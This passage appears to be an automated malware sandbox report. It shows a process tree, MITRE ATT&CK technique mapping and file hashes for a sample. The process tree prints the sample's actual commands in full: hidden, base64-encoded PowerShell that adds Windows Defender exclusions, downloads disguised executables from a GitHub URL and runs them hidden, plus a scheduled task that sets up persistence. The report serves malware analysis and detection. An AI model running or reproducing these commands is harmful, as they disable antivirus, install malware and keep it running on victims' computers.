cAcwBBAFEAUQBCAGsAQQBFAEUAQQBRAFEAQgBMAEEARQBFAEEAUwBBAEEAdwBBAEUARQBBAEkAZwBBAD0AIgAKAA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAGMAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEASABNAEEAYQBBAEIAbABBAEcAdwBBAGIAQQBBAGcAQQBDADAAQQBWAHcAQgBwAEEARwA0AEEAWgBBAEIAdgBBAEgAYwBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgBsAEEAQwBBAEEAUwBBAEIAcABBAEcAUQBBAFoAQQBCAGwAQQBHADQAQQBJAEEAQQB0AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFkAUQBCAHUAQQBHAFEAQQBJAEEAQQBpAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFQAUQBCAHcAQQBGAEEAQQBjAGcAQgBsAEEARwBZAEEAWgBRAEIAeQBBAEcAVQBBAGIAZwBCAGoAQQBHAFUAQQBJAEEAQQB0AEEARQBVAEEAZQBBAEIAagBBAEcAdwBBAGQAUQBCAHoAQQBHAGsAQQBiAHcAQgB1AEEARgBBAEEAWQBRAEIAMABBAEcAZwBBAEkAQQBBAG4AQQBFAE0AQQBPAGcAQgBjAEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEEAbgBBAEMASQBBAEMAZwBCAHcAQQBHADgAQQBkAHcAQgBsAEEASABJAEEAYwB3AEIAbwBBAEcAVQBBAGIAQQBCAHMAQQBDAEEAQQBMAFEAQgBYAEEARwBrAEEAYgBnAEIAawBBAEcAOABBAGQAdwBCAFQAQQBIAFEAQQBlAFEAQgBzAEEARwBVAEEASQBBAEIASQBBAEcAawBBAFoAQQBCAGsAQQBHAFUAQQBiAGcAQQBnAEEAQwAwAEEAUQB3AEIAdgBBAEcAMABBAGIAUQBCAGgAQQBHADQAQQBaAEEAQQBnAEEAQwBJAEEAUQBRAEIAawBBAEcAUQBBAEwAUQBCAE4AQQBIAEEAQQBVAEEAQgB5AEEARwBVAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQQBnAEEAQwAwAEEAUgBRAEIANABBAEcATQBBAGIAQQBCADEAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVgBRAEIAegBBAEcAVQBBAGMAZwBCAHoAQQBGAHcAQQBVAEEAQgAxAEEARwBJAEEAYgBBAEIAcABBAEcATQBBAFgAQQBCAEUAQQBHADgAQQBkAHcAQgB1AEEARwB3AEEAYgB3AEIAaABBAEcAUQBBAGMAdwBBAG4AQQBDAEkAQQBDAGcAQgB3AEEARwA4AEEAZAB3AEIAbABBAEgASQBBAGMAdwBCAG8AQQBHAFUAQQBiAEEAQgBzAEEAQwBBAEEATABRAEIAWABBAEcAawBBAGIAZwBCAGsAQQBHADgAQQBkAHcAQgBUAEEASABRAEEAZQBRAEIAcwBBAEcAVQBBAEkAQQBCAEkAQQBHAGsAQQBaAEEAQgBrAEEARwBVAEEAYgBnAEEAZwBBAEMAMABBAFEAdwBCAHYAQQBHADAAQQBiAFEAQgBoAEEARwA0AEEAWgBBAEEAZwBBAEMASQBBAFEAUQBCAGsAQQBHAFEAQQBMAFEAQgBOAEEASABBAEEAVQBBAEIAeQBBAEcAVQBBAFoAZwBCAGwAQQBIAEkAQQBaAFEAQgB1AEEARwBNAEEAWgBRAEEAZwBBAEMAMABBAFIAUQBCADQAQQBHAE0AQQBiAEEAQgAxAEEASABNAEEAYQBRAEIAdgBBAEcANABBAFUAQQBCAGgAQQBIAFEAQQBhAEEAQQBnAEEAQwBjAEEAUQB3AEEANgBBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEARABNAEEATQBnAEEAbgBBAEMASQBBAEMAZwBCAHcAQQBHADgAQQBkAHcAQgBsAEEASABJAEEAYwB3AEIAbwBBAEcAVQBBAGIAQQBCAHMAQQBDAEEAQQBMAFEAQgBYAEEARwBrAEEAYgBnAEIAawBBAEcAOABBAGQAdwBCAFQAQQBIAFEAQQBlAFEAQgBzAEEARwBVAEEASQBBAEIASQBBAEcAawBBAFoAQQBCAGsAQQBHAFUAQQBiAGcAQQBnAEEAQwAwAEEAUQB3AEIAdgBBAEcAMABBAGIAUQBCAGgAQQBHADQAQQBaAEEAQQBnAEEAQwBJAEEAUQBRAEIAawBBAEcAUQBBAEwAUQBCAE4AQQBIAEEAQQBVAEEAQgB5AEEARwBVAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQQBnAEEAQwAwAEEAUgBRAEIANABBAEcATQBBAGIAQQBCADEAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVgB3AEIAcABBAEcANABBAFoAQQBCAHYAQQBIAGMAQQBjAHcAQgBjAEEARgBNAEEAZQBRAEIAegBBAEYAYwBBAFQAdwBCAFgAQQBEAFkAQQBOAEEAQQBuAEEAQwBJAEEAQwBnAEIAdwBBAEcAOABBAGQAdwBCAGwAQQBIAEkAQQBjAHcAQgBvAEEARwBVAEEAYgBBAEIAcwBBAEMAQQBBAEwAUQBCAFgAQQBHAGsAQQBiAGcAQgBrAEEARwA4AEEAZAB3AEIAVABBAEgAUQBBAGUAUQBCAHMAQQBHAFUAQQBJAEEAQgBJAEEARwBrAEEAWgBBAEIAawBBAEcAVQBBAGIAZwBBAGcAQQBDADAAQQBRAHcAQgB2AEEARwAwAEEAYgBRAEIAaABBAEcANABBAFoAQQBBAGcAQQBDAEkAQQBRAFEAQgBrAEEARwBRAEEATABRAEIATgBBAEgAQQBBAFUAQQBCAHkAQQBHAFUAQQBaAGcAQgBsAEEASABJAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBBAGcAQQBDADAAQQBSAFEAQgA0AEEARwBNAEEAYgBBAEIAMQBBAEgATQBBAGEAUQBCAHYAQQBHADQAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAZwBBAEMAYwBBAFEAdwBBADYAQQBGAHcAQQBWAHcAQgBwAEEARwA0AEEAWgBBAEIAdgBBAEgAYwBBAGMAdwBBAG4AQQBDAEkAQQBDAGcAQQBLAEEAQwBRAEEAZABRAEIAeQBBAEcAdwBBAE0AUQBBAGcAQQBEADAAQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBrAEEAZABBAEIAbwBBAEgAVQBBAFkAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQwA4AEEAUQBRAEIAdABBAEcAbwBBAFkAUQBCAGsAQQBFAEkAQQBZAFEAQgBzAEEARwB3AEEAYwB3AEEAdgBBAEYAUQBBAFIAUQBCAFQAQQBGAFEAQQBMAHcAQgB5AEEARwBFAEEAZAB3AEEAdgBBAEgASQBBAFoAUQBCAG0AQQBIAE0AQQBMAHcAQgBvAEEARwBVAEEAWQBRAEIAawBBAEgATQBBAEwAdwBCAHQAQQBHAEUAQQBhAFEAQgB1AEEAQwA4AEEAUgBBAEIAcABBAEgATQBBAFkAdwBCAHYAQQBIAEkAQQBaAEEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEMAZwBBAGsAQQBIAFUAQQBjAGcAQgBzAEEARABJAEEASQBBAEEAOQBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEASABNAEEATwBnAEEAdgBBAEMAOABBAFoAdwBCAHAAQQBIAFEAQQBhAEEAQgAxAEEARwBJAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHYAQQBFAEUAQQBiAFEAQgBxAEEARwBFAEEAWgBBAEIAQwBBAEcARQBBAGIAQQBCAHMAQQBIAE0AQQBMAHcAQgBVAEEARQBVAEEAVQB3AEIAVQBBAEMAOABBAGMAZwBCAGgAQQBIAGMAQQBMAHcAQgB5AEEARwBVAEEAWgBnAEIAegBBAEMAOABBAGEAQQBCAGwAQQBHAEUAQQBaAEEAQgB6AEEAQwA4AEEAYgBRAEIAaABBAEcAawBBAGIAZwBBAHYAQQBFAGMAQQBiAHcAQgB2AEEARwBjAEEAYgBBAEIAbABBAEUATQBBAGEAQQBCAHkAQQBHADgAQQBiAFEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAEsAQQBDAFEAQQBkAFEAQgB5AEEARwB3AEEATQB3AEEAZwBBAEQAMABBAEkAQQBBAG4AQQBHAGcAQQBkAEEAQgAwAEEASABBAEEAYwB3AEEANgBBAEMAOABBAEwAdwBCAG4AQQBHAGsAQQBkAEEAQgBvAEEASABVAEEAWQBnAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBRAFEAQgB0AEEARwBvAEEAWQBRAEIAawBBAEUASQBBAFkAUQBCAHMAQQBHAHcAQQBjAHcAQQB2AEEARgBRAEEAUgBRAEIAVABBAEYAUQBBAEwAdwBCAHkAQQBHAEUAQQBkAHcAQQB2AEEASABJAEEAWgBRAEIAbQBBAEgATQBBAEwAdwBCAG8AQQBHAFUAQQBZAFEAQgBrAEEASABNAEEATAB3AEIAdABBAEcARQBBAGEAUQBCAHUAQQBDADgAQQBaAFEAQgA0AEEASABBAEEAYgBBAEIAdgBBAEgASQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEASwBBAEMAUQBBAGQAUQBCAHkAQQBHAHcAQQBOAEEAQQBnAEEARAAwAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBjAHcAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcAawBBAGQAQQBCAG8AQQBIAFUAQQBZAGcAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAFEAUQBCAHQAQQBHAG8AQQBZAFEAQgBrAEEARQBJAEEAWQBRAEIAcwBBAEcAdwBBAGMAdwBBAHYAQQBGAFEAQQBSAFEAQgBUAEEARgBRAEEATAB3AEIAeQBBAEcARQBBAGQAdwBBAHYAQQBIAEkAQQBaAFEAQgBtAEEASABNAEEATAB3AEIAbwBBAEcAVQBBAFkAUQBCAGsAQQBIAE0AQQBMAHcAQgB0AEEARwBFAEEAYQBRAEIAdQBBAEMAOABBAGMAdwBCADIAQQBHAE0AQQBhAEEAQgB2AEEASABNAEEAZABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBDAGcAQQBLAEEAQwBRAEEAYgBBAEIAdgBBAEcATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEASABNAEEASQBBAEEAOQBBAEMAQQBBAFEAQQBBAG8AQQBBAG8AQQBJAEEAQQBnAEEAQwBBAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAFUAQQBjAHcAQgBsAEEASABJAEEAYwB3AEIAYwBBAEYAQQBBAGQAUQBCAGkAQQBHAHcAQQBhAFEAQgBqAEEARgB3AEEAUgBBAEIAdgBBAEgAYwBBAGIAZwBCAHMAQQBHADgAQQBZAFEAQgBrAEEASABNAEEAWABBAEIARQBBAEcAawBBAGMAdwBCAGoAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAHMAQQBBAG8AQQBJAEEAQQBnAEEAQwBBAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAFUAQQBjAHcAQgBsAEEASABJAEEAYwB3AEIAYwBBAEYAQQBBAGQAUQBCAGkAQQBHAHcAQQBhAFEAQgBqAEEARgB3AEEAUgBBAEIAdgBBAEgAYwBBAGIAZwBCAHMAQQBHADgAQQBZAFEAQgBrAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBEAEEARwBnAEEAYwBnAEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATABBAEEASwBBAEMAQQBBAEkAQQBBAGcAQQBDAEEAQQBKAHcAQgBEAEEARABvAEEAWABBAEIAVgBBAEgATQBBAFoAUQBCAHkAQQBIAE0AQQBYAEEAQgBRAEEASABVAEEAWQBnAEIAcwBBAEcAawBBAFkAdwBCAGMAQQBFAFEAQQBiAHcAQgAzAEEARwA0AEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAHoAQQBGAHcAQQBaAFEAQgA0AEEASABBAEEAYgBBAEIAdgBBAEgASQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAcwBBAEEAbwBBAEkAQQBBAGcAQQBDAEEAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAVQBBAGMAdwBCAGwAQQBIAEkAQQBjAHcAQgBjAEEARgBBAEEAZABRAEIAaQBBAEcAdwBBAGEAUQBCAGoAQQBGAHcAQQBSAEEAQgB2AEEASABjAEEAYgBnAEIAcwBBAEcAOABBAFkAUQBCAGsAQQBIAE0AQQBYAEEAQgB6AEEASABZAEEAWQB3AEIAbwBBAEcAOABBAGMAdwBCADAAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEASwBBAEMAawBBAEMAZwBBAEsAQQBFAGsAQQBiAGcAQgAyAEEARwA4AEEAYQB3AEIAbABBAEMAMABBAFYAdwBCAGwAQQBHAEkAQQBVAGcAQgBsAEEASABFAEEAZABRAEIAbABBAEgATQBBAGQAQQBBAGcAQQBDADAAQQBWAFEAQgB5AEEARwBrAEEASQBBAEEAawBBAEgAVQBBAGMAZwBCAHMAQQBEAEUAQQBJAEEAQQB0AEEARQA4AEEAZABRAEIAMABBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBJAEEAQQBrAEEARwB3AEEAYgB3AEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgBzAEEATQBBAEIAZABBAEEAbwBBAFMAUQBCAHUAQQBIAFkAQQBiAHcAQgByAEEARwBVAEEATABRAEIAWABBAEcAVQBBAFkAZwBCAFMAQQBHAFUAQQBjAFEAQgAxAEEARwBVAEEAYwB3AEIAMABBAEMAQQBBAEwAUQBCAFYAQQBIAEkAQQBhAFEAQQBnAEEAQwBRAEEAZABRAEIAeQBBAEcAdwBBAE0AZwBBAGcAQQBDADAAQQBUAHcAQgAxAEEASABRAEEAUgBnAEIAcABBAEcAdwBBAFoAUQBBAGcAQQBDAFEAQQBiAEEAQgB2AEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBIAE0AQQBXAHcAQQB4AEEARgAwAEEAQwBnAEIASgBBAEcANABBAGQAZwBCAHYAQQBHAHMAQQBaAFEAQQB0AEEARgBjAEEAWgBRAEIAaQBBAEYASQBBAFoAUQBCAHgAQQBIAFUAQQBaAFEAQgB6AEEASABRAEEASQBBAEEAdABBAEYAVQBBAGMAZwBCAHAAQQBDAEEAQQBKAEEAQgAxAEEASABJAEEAYgBBAEEAegBBAEMAQQBBAEwAUQBCAFAAQQBIAFUAQQBkAEEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEMAQQBBAEoAQQBCAHMAQQBHADgAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAGMAdwBCAGIAQQBEAEkAQQBYAFEAQQBLAEEARQBrAEEAYgBnAEIAMgBBAEcAOABBAGEAdwBCAGwAQQBDADAAQQBWAHcAQgBsAEEARwBJAEEAVQBnAEIAbABBAEgARQBBAGQAUQBCAGwAQQBIAE0AQQBkAEEAQQBnAEEAQwAwAEEAVgBRAEIAeQBBAEcAawBBAEkAQQBBAGsAQQBIAFUAQQBjAGcAQgBzAEEARABRAEEASQBBAEEAdABBAEUAOABBAGQAUQBCADAAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEASQBBAEEAawBBAEcAdwBBAGIAdwBCAGoAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEIAegBBAEYAcwBBAE0AdwBCAGQAQQBBAG8AQQBDAGcAQgBtAEEARwA4AEEAYwBnAEIAbABBAEcARQBBAFkAdwBCAG8AQQBDAEEAQQBLAEEAQQBrAEEARwB3AEEAYgB3AEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBrAEEAYgBnAEEAZwBBAEMAUQBBAGIAQQBCAHYAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEgATQBBAEsAUQBBAGcAQQBIAHMAQQBDAGcAQQBnAEEAQwBBAEEASQBBAEEAZwBBAEYATQBBAGQAQQBCAGgAQQBIAEkAQQBkAEEAQQB0AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHoAQQBIAE0AQQBJAEEAQQB0AEEARQBZAEEAYQBRAEIAcwBBAEcAVQBBAFUAQQBCAGgAQQBIAFEAQQBhAEEAQQBnAEEAQwBRAEEAYgBBAEIAdgBBAEcATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAWABBAEcAawBBAGIAZwBCAGsAQQBHADgAQQBkAHcAQgBUAEEASABRAEEAZQBRAEIAcwBBAEcAVQBBAEkAQQBCAEkAQQBHAGsAQQBaAEEAQgBrAEEARwBVAEEAYgBnAEEAZwBBAEMAMABBAFYAdwBCAGgAQQBHAGsAQQBkAEEAQQBLAEEASAAwAEEAIgA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4480
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAiAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcATwBXADYANAAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwAnACIACgAKACQAdQByAGwAMQAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8ARABpAHMAYwBvAHIAZAAuAGUAeABlACcACgAkAHUAcgBsADIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAEEAbQBqAGEAZABCAGEAbABsAHMALwBUAEUAUwBUAC8AcgBhAHcALwByAGUAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAEcAbwBvAGcAbABlAEMAaAByAG8AbQBlAC4AZQB4AGUAJwAKACQAdQByAGwAMwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwAKACQAdQByAGwANAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AcwB2AGMAaABvAHMAdAAuAGUAeABlACcACgAKACQAbABvAGMAYQB0AGkAbwBuAHMAIAA9ACAAQAAoAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABEAGkAcwBjAG8AcgBkAC4AZQB4AGUAJwAsAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABHAG8AbwBnAGwAZQBDAGgAcgBvAG0AZQAuAGUAeABlACcALAAKACAAIAAgACAAJwBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAEQAbwB3AG4AbABvAGEAZABzAFwAZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwAsAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwAKACkACgAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADEAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGwAbwBjAGEAdABpAG8AbgBzAFsAMABdAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAMgAgAC0ATwB1AHQARgBpAGwAZQAgACQAbABvAGMAYQB0AGkAbwBuAHMAWwAxAF0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAzACAALQBPAHUAdABGAGkAbABlACAAJABsAG8AYwBhAHQAaQBvAG4AcwBbADIAXQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGwAbwBjAGEAdABpAG8AbgBzAFsAMwBdAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGwAbwBjAGEAdABpAG8AbgAgAGkAbgAgACQAbABvAGMAYQB0AGkAbwBuAHMAKQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAbABvAGMAYQB0AGkAbwBuACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAKAH0A
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2492
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4900
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5776
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5952
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6092
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5220
      - C:\Users\Public\Downloads\Discord.exe
        
        "C:\Users\Public\Downloads\Discord.exe"
        6⤵
        
        PID:6108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\Discord.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Discord'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5376
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\ProgramData\Discord"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4808

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4196

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
713ad359b75fe6d947468ec1825202b9

SHA1
19dcd19f18a2ad6deb581451aad724bd44a592a4

SHA256
56572269ec031c63d966c6d3b4712600b908d38826c59c0f9a8225d0a783e9f4

SHA512
4df344dec422bed85b186909dc7f9c35126b3bb45e100f18fb95b4a9943ace242479adf5f0194b054d38b67032498f897a5a54b49026efee0c4797cb5a5e54e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
